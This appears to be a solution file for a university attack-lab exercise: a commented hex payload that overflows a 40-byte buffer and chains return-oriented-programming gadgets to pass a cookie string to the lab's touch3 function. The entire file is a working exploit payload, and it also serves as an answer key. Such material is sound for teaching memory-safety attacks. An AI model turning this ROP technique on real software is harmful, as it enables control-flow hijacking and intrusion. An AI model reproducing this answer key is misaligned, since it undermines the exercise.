30 30 30 30 30 30 30 30 /* eight dumpy chars */
30 30 30 30 30 30 30 30 
30 30 30 30 30 30 30 30 
30 30 30 30 30 30 30 30 
30 30 30 30 30 30 30 30 /* buffer size is 0x28=40 */

06 1a 40 00 00 00 00 00 /* jump to addval_190, 48 89 e0:movq %rsp,%rax */
a2 19 40 00 00 00 00 00 /* movq %rax,%rdi */
ab 19 40 00 00 00 00 00 /* popq %rax */
48 00 00 00 00 00 00 00 /* 0x48 relative address between initial %rsp and string addr */
dd 19 40 00 00 00 00 00 /* movl %eax,%edz */
34 1a 40 00 00 00 00 00 /* movl %edx,%ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx,%esi */
d6 19 40 00 00 00 00 00 /* jumpy to add_xy %rax now is the adress of the desired string */
a2 19 40 00 00 00 00 00 /* movq %rax,%rdi */
fa 18 40 00 00 00 00 00 /* addr of touch3 */
35 39 62 39 39 37 66 61 /* str(cookie in hex), dont forget '\0' */
00 
